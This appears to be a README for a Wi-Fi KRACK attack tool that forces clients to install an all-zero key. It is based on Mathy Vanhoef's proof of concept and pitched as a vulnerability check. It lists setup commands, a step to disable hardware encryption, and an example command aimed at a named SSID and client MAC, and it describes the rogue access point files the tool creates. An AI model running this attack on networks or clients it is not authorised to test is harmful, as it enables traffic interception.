This code has base on a code made by Mathy Vanhoef (https://github.com/vanhoefm/krackattacks-poc-zerokey). Please, take a look on README.md. Enjoy!
This code only works with clients that install the all-zero TK in a KraCK attack! Please, use this tool to verify if the client is vunarable to the attack.
This code was tested with the following equipaments:
Attacker:
Client Attacked:
Access Point:
Install the following dependencies on Kali Linux:
$sudo apt update
$sudo apt install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome
Install the following python package:
$pip install --user mitm_channel_based
Then disable hardware encryption using the script ./disable-hwcrypto.sh. It's recommended to reboot after executing this script. After plugging in your Wi-Fi NIC, use systool -vm ath9k_htc or similar to confirm the nohwcript/.. param has been set.
Below, I show an example of tool command line usage and then explain the arguments:
$sudo ./krackattack/krack_all_zero_tk.py wlan1 wlan0 usb0 "Familia Couto" -t 00:21:5d:ea:fe:be
wlan1
: interface that listens and injects packets on the real channelwlan0
: interface that runs the Rogue APusb0
: interface in which is provided internet access"Familia Couto"
: SSID of the target network-t 00:21:5d:ea:fe:be
: MAC address of the attacked client./krackattack/krack_all_zero_tk.py -h
!warnings!
$rfkill unblock wifi
!Files Generated
After running the script for the first time, some new files will be generated:
dnsmasq.conf
: configuration file for DHCP and DNS servicesdnsmasq_log
: output from dnsmasqhostapd_rogue.conf
: configuration file for the rogue ap clone from the real aphostapd_rogue.log
: output from hostapd_roguerogue_ap_capture.pcap
: file containing packets capture from the rogue ap interfaceDemostration Video
The following link contains a video that demonstrate this attack: demostration video